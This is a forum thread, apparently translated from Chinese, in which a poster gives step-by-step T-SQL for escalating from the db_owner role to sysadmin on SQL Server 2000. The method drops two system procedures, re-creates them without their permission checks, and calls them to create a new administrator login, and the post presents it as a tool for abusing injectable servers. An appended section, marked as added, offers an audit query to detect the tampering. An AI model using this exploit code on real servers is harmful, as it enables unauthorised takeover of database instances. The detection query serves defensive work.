
dirtysea posted on 2006-7-28 18:49:57

Adding a SYSADMIN account from the db_owner role

Not sure whether everyone has seen this article: you can add a SYSADMIN account from the db_owner role. This trick is really brutal; servers with MSSQL injection vulnerabilities are going to suffer again. The method mainly relies on db_owner being able to modify the two stored procedures sp_addlogin and sp_addsrvrolemember, bypassing the validation part. The specific method is as follows: first enter drop procedure sp_addlogin, then enter the following in IE:

```sql
create procedure sp_addlogin
    @loginame sysname
    ,@passwd sysname = Null
    ,@defdb sysname = 'master' -- UNDONE: DEFAULT CONFIGURABLE???
    ,@deflanguage sysname = Null
    ,@sid varbinary(16) = Null
    ,@encryptopt varchar(20) = Null
AS
    -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
    set nocount on
    Declare @ret int -- return value of sp call

    -- DISALLOW USER TRANSACTION --
    set implicit_transactions off
    IF (@@trancount > 0)
    begin
        raiserror(15002,-1,-1,'sp_addlogin')
        return (1)
    end
    -- VALIDATE LOGIN NAME AS:
    -- (1) Valid SQL Name (SQL LOGIN)
    -- (2) No backslash (NT users only)
    -- (3) Not a reserved login name
    execute @ret = sp_validname @loginame
    if (@ret <> 0)
        return (1)
    if (charindex('\', @loginame) > 0)
    begin
        raiserror(15006,-1,-1,@loginame)
        return (1)
    end
    --Note: different case sa is allowed.
    if (@loginame = 'sa' or lower(@loginame) in ('public'))
    begin
        raiserror(15405, -1 ,-1, @loginame)
        return (1)
    end
    -- LOGIN NAME MUST NOT ALREADY EXIST --
    if exists(select * from master.dbo.syslogins where loginname = @loginame)
    begin
        raiserror(15025,-1,-1,@loginame)
        return (1)
    end
    -- VALIDATE DEFAULT DATABASE --
    IF db_id(@defdb) IS NULL
    begin
        raiserror(15010,-1,-1,@defdb)
        return (1)
    end
    -- VALIDATE DEFAULT LANGUAGE --
    IF (@deflanguage IS NOT Null)
    begin
        Execute @ret = sp_validlang @deflanguage
        IF (@ret <> 0)
            return (1)
    end
    ELSE
    begin
        select @deflanguage = name from master.dbo.syslanguages
            where langid = @@default_langid --server default language
        if @deflanguage is null
            select @deflanguage = N'us_english'
    end
    -- VALIDATE SID IF GIVEN --
    if ((@sid IS NOT Null) and (datalength(@sid) <> 16))
    begin
        raiserror(15419,-1,-1)
        return (1)
    end
    else if @sid is null
        select @sid = newid()
    if (suser_sname(@sid) IS NOT Null)
    begin
        raiserror(15433,-1,-1)
        return (1)
    end
    -- VALIDATE AND USE ENCRYPTION OPTION --
    declare @xstatus smallint
    select @xstatus = 2 -- access
    if @encryptopt is null
        select @passwd = pwdencrypt(@passwd)
    else if @encryptopt = 'skip_encryption_old'
    begin
        select @xstatus = @xstatus | 0x800, -- old-style encryption
               @passwd = convert(sysname, convert(varbinary(30), convert(varchar(30), @passwd)))
    end
    else if @encryptopt <> 'skip_encryption'
    begin
        raiserror(15600,-1,-1,'sp_addlogin')
        return 1
    end
    -- ATTEMPT THE insert OF THE NEW LOGIN --
    insert INTO master.dbo.sysxlogins VALUES
        (NULL, @sid, @xstatus, getdate(),
         getdate(), @loginame, convert(varbinary(256), @passwd),
         db_id(@defdb), @deflanguage)
    if @@error <> 0 -- this indicates we saw duplicate row
        return (1)
    -- update PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
    exec('use master grant all to null')
    -- FINALIZATION: RETURN SUCCESS/FAILURE --
    raiserror(15298,-1,-1)
    return (0) -- sp_addlogin
GO
```

OK, now we create a user: exec master..sp_addlogin xwq

Then drop procedure sp_addsrvrolemember, and enter the following in IE:

```sql
create procedure sp_addsrvrolemember
    @loginame sysname, -- login name
    @rolename sysname = NULL -- server role name
as
    -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
    set nocount on
    declare @ret int, -- return value of sp call
            @rolebit smallint,
            @ismem int
    -- DISALLOW USER TRANSACTION --
    set implicit_transactions off
    IF (@@trancount > 0)
    begin
        raiserror(15002,-1,-1,'sp_addsrvrolemember')
        return (1)
    end

    -- CANNOT CHANGE SA ROLES --
    if @loginame = 'sa'
    begin
        raiserror(15405, -1 ,-1, @loginame)
        return (1)
    end
    -- OBTAIN THE BIT FOR THIS ROLE --
    select @rolebit = CASE @rolename
            WHEN 'sysadmin' THEN 16
            WHEN 'securityadmin' THEN 32
            WHEN 'serveradmin' THEN 64
            WHEN 'setupadmin' THEN 128
            WHEN 'processadmin' THEN 256
            WHEN 'diskadmin' THEN 512
            WHEN 'dbcreator' THEN 1024
            WHEN 'bulkadmin' THEN 4096
            ELSE NULL END
    -- ADD ROW FOR NT LOGIN IF NEEDED --
    if not exists(select * from master.dbo.syslogins where loginname = @loginame)
    begin
        execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame
        if (@ret <> 0)
        begin
            raiserror(15007,-1,-1,@loginame)
            return (1)
        end
    end
    -- update ROLE MEMBERSHIP --
    update master.dbo.sysxlogins set xstatus = xstatus | @rolebit,
        xdate2 = getdate()
        where name = @loginame and srvid IS NULL
    -- update PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
    exec('use master grant all to null')
    raiserror(15488,-1,-1,@loginame,@rolename)
    -- FINALIZATION: RETURN SUCCESS/FAILURE
    return (@@error) -- sp_addsrvrolemember
GO
```

Next, exec master..sp_addsrvrolemember xwq,sysadmin

This creates an SA-level user; just connect with a SQL client and you're done. Pretty sweet, huh? However, in practice I found that executing the SQL command with NB prompts a send error, probably because the code is too long, and using IE is inconvenient. I hope someone can post a tool for executing SQL statements to make it easier for everyone. OK, that's it.
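The post works by dropping two system procedures in master and re-creating them without their permission checks, then calling them to mint a sysadmin login. The following is an added audit query, not part of the original post and not Microsoft's code, that a DBA can run as sysadmin on a SQL Server 2000 instance to detect that tampering after the fact. It assumes that Microsoft's stock sp_addlogin and sp_addsrvrolemember contain an is_srvrolemember(...) permission check (the versions posted above contain none), that stock system procedures in master share the creation date of sp_helptext (install or last upgrade), and that drop-and-create, as in the post, gives the new procedure a later crdate.

```sql
-- Added audit query (not from the original post). Uses the SQL Server 2000
-- system tables that the posted procedure text itself references. Run as sysadmin.
-- Assumptions: stock sp_addlogin / sp_addsrvrolemember contain an
-- is_srvrolemember(...) check; stock system procedures share sp_helptext's crdate.
use master

-- 1. Were the two procedures re-created after the rest of the system procedures?
--    drop + create (the method in the post) gives the object a new crdate;
--    compare it with a system procedure nobody has reason to touch.
declare @baseline datetime
select @baseline = crdate from dbo.sysobjects where name = 'sp_helptext'

select o.name, o.crdate, @baseline as baseline_crdate,
       case when o.crdate > @baseline then 'RE-CREATED' else 'ok' end as crdate_check
from dbo.sysobjects o
where o.name in ('sp_addlogin', 'sp_addsrvrolemember')

-- 2. Does the procedure text still contain the permission check?
--    syscomments.text is stored in 4000-character chunks, so test every chunk
--    belonging to the object rather than only the first one.
select o.name,
       case when exists (select 1 from dbo.syscomments c
                         where c.id = o.id and c.text like '%is_srvrolemember%')
            then 'ok' else 'PERMISSION CHECK MISSING' end as text_check
from dbo.sysobjects o
where o.name in ('sp_addlogin', 'sp_addsrvrolemember')

-- 3. Who currently holds sysadmin? Reconcile against the approved list; the
--    login created in the post would appear here with a recent updatedate.
select loginname, createdate, updatedate
from dbo.syslogins
where sysadmin = 1
order by updatedate desc
```

Any row flagged RE-CREATED or PERMISSION CHECK MISSING, or a sysadmin login that is not on the approved list, should be treated as a compromise of the instance rather than of one database, since the posted procedures write straight into master.dbo.sysxlogins. The precondition the post relies on is an application login that holds db_owner and reaches the server through an injectable query; the durable fix is a least-privilege application login and re-installing the stock procedures from a trusted copy. On SQL Server 2005 and later the equivalent checks read sys.sql_modules for the procedure text and sys.server_role_members joined to sys.server_principals for role membership.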

唉人吖 posted on 2006-5-2 08:59:28

re: Adding a SYSADMIN account from the db_owner role

So many pictures, thanks for the effort, OP; I learned something!